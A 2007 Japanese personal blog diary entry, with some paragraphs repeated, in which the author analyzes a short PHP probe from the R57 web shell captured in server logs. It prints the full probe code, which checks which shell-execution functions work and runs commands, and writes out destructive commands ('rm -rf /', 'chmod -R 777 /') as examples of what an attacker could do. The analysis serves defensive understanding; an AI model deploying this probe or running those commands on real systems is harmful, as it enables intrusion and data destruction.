にっき
2007/08/24 19:03:39
R57☆
なんだかろぐ関連のにっきに描いてからあたっくが増えたような気がするけど・・・
いろんなとこで出てるみたいだから絶対数が増えただけなのかなぁ?(´・ω・`;【みかん
むうみんが確認できたのだけでも UA やすくりぷが変わってたりでいろんな種類出てるみたいだし・・・
とりあえず今日は捕獲した中でも短めのを☆
こ〜どもすっきりしてるだけあって単純に
・OS 名
・せ〜ふも〜ど(exec, shell_exec, system, passthru, popen ってしすてむ系のこまんどが使えるかのちぇっく)
・かれんとでぃれくとり
を表示するだけっぽいのです☆
でも echo の結果を取得してその文字列を比較ってなんだかめんど〜なことしてるにゃぁ・・・
ex が bool を返すようにしちゃえばそれでおしまいっぽいけどなにか意味があるのかなぁ?
たぶんきっとどこかから ex って関数をこぴぺしただけだと思うけど...〆(´ω`;【みかん
どっちにしてもこれでせ〜ふも〜ど OFF が出ちゃったら
とか
みたいのもできちゃうのかにゃぁ・・・
apache もじゅーる + root 権限か suexec で root 権限みたいな無茶しなければ
↑のを実行してもぱ〜みっしょんえら〜でおしまいだけどにう(´ω`;【みかん
いろんなとこで出てるみたいだから絶対数が増えただけなのかなぁ?(´・ω・`;【みかん
むうみんが確認できたのだけでも UA やすくりぷが変わってたりでいろんな種類出てるみたいだし・・・
とりあえず今日は捕獲した中でも短めのを☆
<?php
$dir = @getcwd();
$OS = @PHP_OS;
if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
function ws($i)
{
return @str_repeat(" ",$i);
}
function ex($cfe)
{
$res = '';
if (!empty($cfe))
{
if(function_exists('exec'))
{
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($cfe);
}
elseif(function_exists('system'))
{
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
echo '<html><head>';
echo '</head>';
echo '<body><table>';
echo "OS:{$OS}";
echo ws(1)."safemode:";
echo (($safe_mode)?("ON"):("OFF"));
echo ws(1)."pwd:$dir";
echo "</table>";
?>
こ〜どもすっきりしてるだけあって単純に
・OS 名
・せ〜ふも〜ど(exec, shell_exec, system, passthru, popen ってしすてむ系のこまんどが使えるかのちぇっく)
・かれんとでぃれくとり
を表示するだけっぽいのです☆
でも echo の結果を取得してその文字列を比較ってなんだかめんど〜なことしてるにゃぁ・・・
ex が bool を返すようにしちゃえばそれでおしまいっぽいけどなにか意味があるのかなぁ?
たぶんきっとどこかから ex って関数をこぴぺしただけだと思うけど...〆(´ω`;【みかん
どっちにしてもこれでせ〜ふも〜ど OFF が出ちゃったら
rm -rf /
とか
chmod -R 777 /
みたいのもできちゃうのかにゃぁ・・・
apache もじゅーる + root 権限か suexec で root 権限みたいな無茶しなければ
↑のを実行してもぱ〜みっしょんえら〜でおしまいだけどにう(´ω`;【みかん
こめんと
投稿された内容の著作権はこめんとの投稿者に帰属するっぽいです☆また,現在 IE6 以下で Sleipnir,Lunascape,Donut じゃないゆ〜ざえ〜じぇんとからの描き込みを制限してますです☆
該当しちゃうかたはてきとうにゆ〜ざえ〜じぇんとを偽装しちゃってくださいです(´ω`;【みかん